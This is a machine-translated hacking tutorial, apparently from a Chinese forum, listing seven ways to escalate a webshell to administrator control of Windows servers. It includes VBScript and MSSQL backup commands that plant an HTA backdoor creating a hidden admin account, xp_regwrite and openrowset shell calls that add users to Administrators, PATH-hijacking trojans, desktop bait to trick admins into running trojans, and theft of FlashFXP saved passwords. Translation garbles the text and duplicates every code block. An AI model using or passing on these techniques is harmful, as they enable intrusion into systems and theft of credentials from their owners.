Techniques for permission escalation and Connection

Author: 4 lert
From: [H.S. G] http://www.3hsg.net
Ps: For reprint, please indicate from H.S. G and author, thx!

There are a variety of methods for elevation of permission on the network. In fact, it is simply summarized as overflow, third-party software defects, and permission escalation in social engineering. What we want to discuss today is some skills in the Process of elevation of permission. After mastering these skills, we can quickly convert our webshell to terminal login permissions.

1. Inertial click method. This method makes full use of people's curiosity. Let's take a look at the application of psychology. When we get webshell, we can use this method if we try to overflow or the vulnerability Elevation of Privilege of common third-party software is invalid. The specific method is to create a shortcut pointing to the directory we have permission to create on the Administrator's desktop. The name can be used by yourself, for example, "Administrator check", "server intrusion", etc. Then, create directories with the same name in the directory. Take the depth of 5-6 directories as the best, and place Trojans with the same folder icon in the last sub-directory. Universal management usually keeps double-clicking the directory. When he produces inertial clicks, that is, when he double-clicking the Trojan. The rest is how you handle it. You have got a zombie.
2. MSSQL backup HTA method. In the past, DB_OWNER privilege was used to back up BAT files to system startup items. However, the success rate of backing up BAT files remains low. This is essentially because a large amount of other data is written to the BAT file during database backup, whether it is log backup or differential backup, but the command length in the BAT file is limited. Therefore, the success rate of backup is very low. However, we can back up the file as an HTA file. The HTA file is short for HTML Application and translated into Chinese as an HTML Application. We can use it to write an HTA file, back up to the startup Item.

View plaincopy to clipboardprint?
<Script language = "VBScript">
Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")
OS = "WinNT: //" & wsnetwork. ComputerName
Set ob = GetObject (OS)
Set oe = GetObject (OS & "/Administrators, group ")
Set od = ob. Create ("user", "4 lert ")
Od. SetPassword "4 lert"
Od. SetInfo
Set of = GetObject (OS & "/4 lert", user)
Oe. add OS & "/4 lert"
</Script>
<Script language = javascript> window. close (); </script>
<Script language = "VBScript">
Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")
OS = "WinNT: //" & wsnetwork. ComputerName
Set ob = GetObject (OS)
Set oe = GetObject (OS & "/Administrators, group ")
Set od = ob. Create ("user", "4 lert ")
Od. SetPassword "4 lert"
Od. SetInfo
Set of = GetObject (OS & "/4 lert", user)
Oe. add OS & "/4 lert"
</Script>
<Script language = javascript> window. close (); </script>

In the end, I thought that using the Wscript. NetWork component was the most successful. The previous Code creates a 4lert user, and the password is also 4 lert. Then we will convert this code to hexadecimal. Here we will give only the LOG backup code.
View plaincopy to clipboardprint?
Alter database name set recovery full --
Create table 4 lert (cmd image )--
Backup log database name to disk = c: ak. bak with init --
Insert into cmd (a) values (values )--
Backup log database name to disk = c: E ~ 1alluse ~ 1 "start" Menu \ Program start \ shit. hta --
Drop table 4lert --
Alter database name set recovery full --
Create table 4 lert (cmd image )--
Backup log database name to disk = c: ak. bak with init --
Insert into cmd (a) values (values )--
Backup log database name to disk = c: E ~ 1alluse ~ 1 "start" Menu \ Program start \ shit. hta --
Drop table 4lert --

Of course, this method still has limitations. You can expand it more.

3. Use of environment variables. Sometimes we get some surprises when viewing system variables in webshell. For example, the default environment variable Path is % SystemRoot % system32; % SystemRoot %; % SystemRoot % System32Wbem; If php is installed in the system, the environment variable may be c: php; % SystemRoot % system32; % SystemRoot % System32Wbem; then we can take advantage of it, because its order is in front of the default path of the system. Then, according to the priority, if we execute ipconfig, it will first go to the c: PHP Directory to check for the existence of the ipconfig.exe file. If the file exists, it will first execute the ipconfig.exe file in the c: PHP Directory. Therefore, we can upload a trojan named ipconfig.exe and upload it to the c: php Directory. When the Administrator runs ipconfig on the command line, the system will execute the trojan file under c: php. In this way, we can also obtain system permissions. It is also quite concealed and generally not easily discovered. This is not a good way to raise the right.

4. FLASHFXP privilege escalation. In fact, this method is also a very effective method of Elevation of Privilege, from which we can generally guess the Administrator terminal login password. If you find the installation directory of FlashFxp in shell, you can download three files: sites. dat, quick. dat, and Stats. dat, and then directly overwrite the local FlashFxp file. Open FlashFxp and you will be able to see the information that the Administrator has logged on to. The password is displayed as * and can be viewed in the asterisk password viewer. After obtaining the password, you can conduct social engineering or further intrusion.

5. privilege escalation. The two most typical software applications are NetBox and Magic Winmail. They are installed by default using SYSTEM, so they can easily call net to add users. Magic Winmail places a php Trojan under serverwebmail to execute net to add users.

6. Elevation of Privilege in sandbox mode. The Sandbox mode can solve the problem of xp_mongoshell extended stored procedures and other stored procedures not available. The Sandbox mode is disabled by default, so we need xp_regwrite to enable the sandbox mode.

View plaincopy to clipboardprint?
Exec master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0
Engines, SandBoxMode, REG_DWORD, 1
Exec master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0
Engines, SandBoxMode, REG_DWORD, 1

Run the command to add an account with the 4lert username and 4lert Password
View plaincopy to clipboardprint?
Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windows
System32iasias. mdb, select shell ("cmd.exe/c net usertest 1234/add "))

Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windows
System32iasias. mdb, select shell ("cmd.exe/c net localgroup
Administrators test/add "))
Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windows
System32iasias. mdb, select shell ("cmd.exe/c net usertest 1234/add "))

Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windows
System32iasias. mdb, select shell ("cmd.exe/c net localgroup
Administrators test/add "))

7. Bind the software frequently used by administrators to escalate permissions. If the webshell permission is slightly higher and no third-party software vulnerabilities can be exploited, we can view the Administrator's desktop or start menu to find the software that you think the Administrator will often use, download the shortcut to find the installation directory. If you have the permission to modify the directory, You can bind the software. Then we only need to wait for the Administrator to launch the software we bundled. This method is a bit opportunistic, but it is not a special method of Elevation of Privilege.

The above methods are all skillful. If you use them well, you can quickly obtain the permissions of the target server, of course, some overflow elevation methods are not within the scope of this article.

Reference address:
Note: This address is only available today.